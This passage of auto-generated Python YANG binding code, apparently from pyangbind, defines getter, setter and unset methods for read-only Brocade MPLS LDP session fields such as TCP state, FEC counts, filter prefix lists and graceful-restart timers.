if hasattr(self, '_set'):
self._set()
def _unset_tcp_conn_remote(self):
self.__tcp_conn_remote = YANGDynClass(base=unicode, is_leaf=True, yang_name="tcp-conn-remote", rest_name="tcp-conn-remote", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_tcp_state(self):
"""
Getter method for tcp_state, mapped from YANG variable /mpls_state/ldp/ldp_session/tcp_state (string)
YANG Description: tcpState
"""
return self.__tcp_state
def _set_tcp_state(self, v, load=False):
"""
Setter method for tcp_state, mapped from YANG variable /mpls_state/ldp/ldp_session/tcp_state (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_tcp_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_tcp_state() directly.
YANG Description: tcpState
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="tcp-state", rest_name="tcp-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """tcp_state must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="tcp-state", rest_name="tcp-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__tcp_state = t
if hasattr(self, '_set'):
self._set()
def _unset_tcp_state(self):
self.__tcp_state = YANGDynClass(base=unicode, is_leaf=True, yang_name="tcp-state", rest_name="tcp-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_num_fecs_received_from_peer(self):
"""
Getter method for num_fecs_received_from_peer, mapped from YANG variable /mpls_state/ldp/ldp_session/num_fecs_received_from_peer (uint32)
YANG Description: numFecsReceivedFromPeer
"""
return self.__num_fecs_received_from_peer
def _set_num_fecs_received_from_peer(self, v, load=False):
"""
Setter method for num_fecs_received_from_peer, mapped from YANG variable /mpls_state/ldp/ldp_session/num_fecs_received_from_peer (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_num_fecs_received_from_peer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_num_fecs_received_from_peer() directly.
YANG Description: numFecsReceivedFromPeer
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="num-fecs-received-from-peer", rest_name="num-fecs-received-from-peer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """num_fecs_received_from_peer must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="num-fecs-received-from-peer", rest_name="num-fecs-received-from-peer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__num_fecs_received_from_peer = t
if hasattr(self, '_set'):
self._set()
def _unset_num_fecs_received_from_peer(self):
self.__num_fecs_received_from_peer = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="num-fecs-received-from-peer", rest_name="num-fecs-received-from-peer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_num_fecs_installed_from_peer(self):
"""
Getter method for num_fecs_installed_from_peer, mapped from YANG variable /mpls_state/ldp/ldp_session/num_fecs_installed_from_peer (uint32)
YANG Description: numFecsInstalledFromPeer
"""
return self.__num_fecs_installed_from_peer
def _set_num_fecs_installed_from_peer(self, v, load=False):
"""
Setter method for num_fecs_installed_from_peer, mapped from YANG variable /mpls_state/ldp/ldp_session/num_fecs_installed_from_peer (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_num_fecs_installed_from_peer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_num_fecs_installed_from_peer() directly.
YANG Description: numFecsInstalledFromPeer
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="num-fecs-installed-from-peer", rest_name="num-fecs-installed-from-peer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """num_fecs_installed_from_peer must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="num-fecs-installed-from-peer", rest_name="num-fecs-installed-from-peer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__num_fecs_installed_from_peer = t
if hasattr(self, '_set'):
self._set()
def _unset_num_fecs_installed_from_peer(self):
self.__num_fecs_installed_from_peer = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="num-fecs-installed-from-peer", rest_name="num-fecs-installed-from-peer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_is_fecs_pending_uninstall(self):
"""
Getter method for is_fecs_pending_uninstall, mapped from YANG variable /mpls_state/ldp/ldp_session/is_fecs_pending_uninstall (boolean)
YANG Description: isFecsPendingUninstall
"""
return self.__is_fecs_pending_uninstall
def _set_is_fecs_pending_uninstall(self, v, load=False):
"""
Setter method for is_fecs_pending_uninstall, mapped from YANG variable /mpls_state/ldp/ldp_session/is_fecs_pending_uninstall (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_is_fecs_pending_uninstall is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_is_fecs_pending_uninstall() directly.
YANG Description: isFecsPendingUninstall
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="is-fecs-pending-uninstall", rest_name="is-fecs-pending-uninstall", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """is_fecs_pending_uninstall must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="is-fecs-pending-uninstall", rest_name="is-fecs-pending-uninstall", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
})
self.__is_fecs_pending_uninstall = t
if hasattr(self, '_set'):
self._set()
def _unset_is_fecs_pending_uninstall(self):
self.__is_fecs_pending_uninstall = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="is-fecs-pending-uninstall", rest_name="is-fecs-pending-uninstall", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_num_fecs_filtered_out(self):
"""
Getter method for num_fecs_filtered_out, mapped from YANG variable /mpls_state/ldp/ldp_session/num_fecs_filtered_out (uint32)
YANG Description: numFecsFilteredOut
"""
return self.__num_fecs_filtered_out
def _set_num_fecs_filtered_out(self, v, load=False):
"""
Setter method for num_fecs_filtered_out, mapped from YANG variable /mpls_state/ldp/ldp_session/num_fecs_filtered_out (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_num_fecs_filtered_out is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_num_fecs_filtered_out() directly.
YANG Description: numFecsFilteredOut
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="num-fecs-filtered-out", rest_name="num-fecs-filtered-out", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """num_fecs_filtered_out must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="num-fecs-filtered-out", rest_name="num-fecs-filtered-out", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__num_fecs_filtered_out = t
if hasattr(self, '_set'):
self._set()
def _unset_num_fecs_filtered_out(self):
self.__num_fecs_filtered_out = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="num-fecs-filtered-out", rest_name="num-fecs-filtered-out", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_num_fecs_filtered_in(self):
"""
Getter method for num_fecs_filtered_in, mapped from YANG variable /mpls_state/ldp/ldp_session/num_fecs_filtered_in (uint32)
YANG Description: numFecsFilteredIn
"""
return self.__num_fecs_filtered_in
def _set_num_fecs_filtered_in(self, v, load=False):
"""
Setter method for num_fecs_filtered_in, mapped from YANG variable /mpls_state/ldp/ldp_session/num_fecs_filtered_in (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_num_fecs_filtered_in is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_num_fecs_filtered_in() directly.
YANG Description: numFecsFilteredIn
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="num-fecs-filtered-in", rest_name="num-fecs-filtered-in", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """num_fecs_filtered_in must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="num-fecs-filtered-in", rest_name="num-fecs-filtered-in", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__num_fecs_filtered_in = t
if hasattr(self, '_set'):
self._set()
def _unset_num_fecs_filtered_in(self):
self.__num_fecs_filtered_in = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="num-fecs-filtered-in", rest_name="num-fecs-filtered-in", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_filter_prefix_list_name(self):
"""
Getter method for filter_prefix_list_name, mapped from YANG variable /mpls_state/ldp/ldp_session/filter_prefix_list_name (string)
YANG Description: dataFilterPrefixList
"""
return self.__filter_prefix_list_name
def _set_filter_prefix_list_name(self, v, load=False):
"""
Setter method for filter_prefix_list_name, mapped from YANG variable /mpls_state/ldp/ldp_session/filter_prefix_list_name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_filter_prefix_list_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_filter_prefix_list_name() directly.
YANG Description: dataFilterPrefixList
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="filter-prefix-list-name", rest_name="filter-prefix-list-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """filter_prefix_list_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="filter-prefix-list-name", rest_name="filter-prefix-list-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__filter_prefix_list_name = t
if hasattr(self, '_set'):
self._set()
def _unset_filter_prefix_list_name(self):
self.__filter_prefix_list_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="filter-prefix-list-name", rest_name="filter-prefix-list-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_filter_prefix_list_exists(self):
"""
Getter method for filter_prefix_list_exists, mapped from YANG variable /mpls_state/ldp/ldp_session/filter_prefix_list_exists (boolean)
YANG Description: dataFilterPrefixListExists
"""
return self.__filter_prefix_list_exists
def _set_filter_prefix_list_exists(self, v, load=False):
"""
Setter method for filter_prefix_list_exists, mapped from YANG variable /mpls_state/ldp/ldp_session/filter_prefix_list_exists (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_filter_prefix_list_exists is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_filter_prefix_list_exists() directly.
YANG Description: dataFilterPrefixListExists
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="filter-prefix-list-exists", rest_name="filter-prefix-list-exists", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """filter_prefix_list_exists must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="filter-prefix-list-exists", rest_name="filter-prefix-list-exists", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
})
self.__filter_prefix_list_exists = t
if hasattr(self, '_set'):
self._set()
def _unset_filter_prefix_list_exists(self):
self.__filter_prefix_list_exists = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="filter-prefix-list-exists", rest_name="filter-prefix-list-exists", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_is_only_gr_valid(self):
"""
Getter method for is_only_gr_valid, mapped from YANG variable /mpls_state/ldp/ldp_session/is_only_gr_valid (boolean)
YANG Description: isOnlyGRValid
"""
return self.__is_only_gr_valid
def _set_is_only_gr_valid(self, v, load=False):
"""
Setter method for is_only_gr_valid, mapped from YANG variable /mpls_state/ldp/ldp_session/is_only_gr_valid (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_is_only_gr_valid is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_is_only_gr_valid() directly.
YANG Description: isOnlyGRValid
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="is-only-gr-valid", rest_name="is-only-gr-valid", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """is_only_gr_valid must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="is-only-gr-valid", rest_name="is-only-gr-valid", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
})
self.__is_only_gr_valid = t
if hasattr(self, '_set'):
self._set()
def _unset_is_only_gr_valid(self):
self.__is_only_gr_valid = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="is-only-gr-valid", rest_name="is-only-gr-valid", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_gr_enabled(self):
"""
Getter method for gr_enabled, mapped from YANG variable /mpls_state/ldp/ldp_session/gr_enabled (boolean)
YANG Description: grEnabled
"""
return self.__gr_enabled
def _set_gr_enabled(self, v, load=False):
"""
Setter method for gr_enabled, mapped from YANG variable /mpls_state/ldp/ldp_session/gr_enabled (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_gr_enabled is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_gr_enabled() directly.
YANG Description: grEnabled
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="gr-enabled", rest_name="gr-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """gr_enabled must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="gr-enabled", rest_name="gr-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
})
self.__gr_enabled = t
if hasattr(self, '_set'):
self._set()
def _unset_gr_enabled(self):
self.__gr_enabled = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="gr-enabled", rest_name="gr-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_peer_reconnect_time(self):
"""
Getter method for peer_reconnect_time, mapped from YANG variable /mpls_state/ldp/ldp_session/peer_reconnect_time (uint32)
YANG Description: peerReconectTime
"""
return self.__peer_reconnect_time
def _set_peer_reconnect_time(self, v, load=False):
"""
Setter method for peer_reconnect_time, mapped from YANG variable /mpls_state/ldp/ldp_session/peer_reconnect_time (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_peer_reconnect_time is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_peer_reconnect_time() directly.
YANG Description: peerReconectTime
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="peer-reconnect-time", rest_name="peer-reconnect-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """peer_reconnect_time must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="peer-reconnect-time", rest_name="peer-reconnect-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__peer_reconnect_time = t
if hasattr(self, '_set'):
self._set()
def _unset_peer_reconnect_time(self):
self.__peer_reconnect_time = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="peer-reconnect-time", rest_name="peer-reconnect-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_peer_recovery_time(self):
"""
Getter method for peer_recovery_time, mapped from YANG variable /mpls_state/ldp/ldp_session/peer_recovery_time (uint32)
YANG Description: peerRecoveryTime
"""
return self.__peer_recovery_time
def _set_peer_recovery_time(self, v, load=False):
"""
Setter method for peer_recovery_time, mapped from YANG variable /mpls_state/ldp/ldp_session/peer_recovery_time (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_peer_recovery_time is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_peer_recovery_time() directly.
YANG Description: peerRecoveryTime
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="peer-recovery-time", rest_name="peer-recovery-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """peer_recovery_time must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="peer-recovery-time", rest_name="peer-recovery-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__peer_recovery_time = t
if hasattr(self, '_set'):
self._set()
def _unset_peer_recovery_time(self):
self.__peer_recovery_time = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="peer-recovery-time", rest_name="peer-recovery-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_reconnect_time_in_use(self):
"""
Getter method for reconnect_time_in_use, mapped from YANG variable /mpls_state/ldp/ldp_session/reconnect_time_in_use (uint32)
"""
return self.__reconnect_time_in_use
def _set_reconnect_time_in_use(self, v, load=False):
"""
Setter method for reconnect_time_in_use, mapped from YANG variable /mpls_state/ldp/ldp_session/reconnect_time_in_use (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_reconnect_time_in_use is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_reconnect_time_in_use() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="reconnect-time-in-use", rest_name="reconnect-time-in-use", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """reconnect_time_in_use must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="reconnect-time-in-use", rest_name="reconnect-time-in-use", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__reconnect_time_in_use = t
if hasattr(self, '_set'):
self._set()
def _unset_reconnect_time_in_use(self):
self.__reconnect_time_in_use = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="reconnect-time-in-use", rest_name="reconnect-time-in-use", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_reconnect_time_remaining(self):
"""
Getter method for reconnect_time_remaining, mapped from YANG variable /mpls_state/ldp/ldp_session/reconnect_time_remaining (uint32)
"""
return self.__reconnect_time_remaining
def _set_reconnect_time_remaining(self, v, load=False):
"""
Setter method for reconnect_time_remaining, mapped from YANG variable /mpls_state/ldp/ldp_session/reconnect_time_remaining (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_reconnect_time_remaining is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_reconnect_time_remaining() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="reconnect-time-remaining", rest_name="reconnect-time-remaining", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """reconnect_time_remaining must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="reconnect-time-remaining", rest_name="reconnect-time-remaining", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__reconnect_time_remaining = t
if hasattr(self, '_set'):
self._set()
def _unset_reconnect_time_remaining(self):
self.__reconnect_time_remaining = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="reconnect-time-remaining", rest_name="reconnect-time-remaining", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_recovery_time_in_use(self):
"""
Getter method for recovery_time_in_use, mapped from YANG variable /mpls_state/ldp/ldp_session/recovery_time_in_use (uint32)
"""
return self.__recovery_time_in_use
def _set_recovery_time_in_use(self, v, load=False):
"""
Setter method for recovery_time_in_use, mapped from YANG variable /mpls_state/ldp/ldp_session/recovery_time_in_use (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_recovery_time_in_use is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_recovery_time_in_use() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="recovery-time-in-use", rest_name="recovery-time-in-use", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """recovery_time_in_use must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="recovery-time-in-use", rest_name="recovery-time-in-use", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__recovery_time_in_use = t
if hasattr(self, '_set'):
self._set()
def _unset_recovery_time_in_use(self):
